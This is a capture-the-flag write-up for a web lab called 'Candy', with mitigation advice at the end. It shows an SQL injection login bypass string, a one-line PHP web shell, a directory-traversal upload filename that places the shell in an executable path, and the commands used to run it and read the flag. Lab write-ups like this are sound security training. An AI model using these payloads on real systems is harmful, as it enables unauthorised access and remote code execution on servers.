SQL Injection & File Upload Abuse – Admin Bypass Leading to RCE | Candy
Lab Link
Lab: Candy
Overview
This lab simulates a themed confectionery website with a hidden staff portal. The application contains multiple security issues, starting from SQL injection in the login flow and escalating into insecure file upload handling that eventually leads to remote command execution.
Objective
Bypass the admin login, gain access to the staff portal, exploit insecure file upload functionality, and achieve remote command execution to retrieve the flag from the server.
Exploitation
1. Admin login bypass (SQL Injection)
The staff login portal is discovered:
1
https://2b22935e-4065-candy-8794a.events.webverselabs-pro.com/admin/login.php
SQL injection bypass payload:
1
' or 1=1-- -
This grants access without valid credentials.
2. Upload functionality discovered
After login, an avatar upload feature is found:
1
/admin/profile.php
This endpoint allows file uploads, which becomes the main attack surface.
3. Initial web shell upload
A PHP shell is uploaded:
1
<?php system($_GET['cmd']); ?>
Saved location observed:
1
/uploads/shell.php
However, execution initially fails because the file is treated as plain text.
4. Directory traversal attempt in upload
Using intercepted request:
1
POST /admin/upload-avatar.php
Attempted payload:
1
../../../includes/shell.php
This fails due to path resolution restrictions.
5. Adjusted traversal path
A corrected payload is used:
1
../includes/shell.php
Response confirms altered storage path:
1
/uploads/../includes/shell.php
This successfully places the file inside a reachable executable directory.
6. Command execution achieved
Accessing the shell:
1
https://2b22935e-4065-candy-8794a.events.webverselabs-pro.com/includes/shell.php?cmd=id
Output:
1
uid=1101(aurora) gid=1101(aurora) groups=1101(aurora)
Remote command execution confirmed.
7. Locating the flag
Search for flag file:
1
find / -name "*flag*" 2>/dev/null
Result:
1
/flag.txt
8. Reading the flag
1
cat /flag.txt
Final output:
1
WEBVERSE{.....}
Impact
- Authentication bypass via SQL Injection
- Unauthorized admin access
- Insecure file upload leading to server-side code execution
- Full command execution on target system
- Sensitive file disclosure
Mitigation
- Use parameterized queries for authentication logic
- Implement strict authentication and session validation
- Restrict file uploads to safe types only (no executable formats)
- Store uploads outside web root
- Enforce proper path sanitization to prevent traversal
- Disable execution permissions in upload directories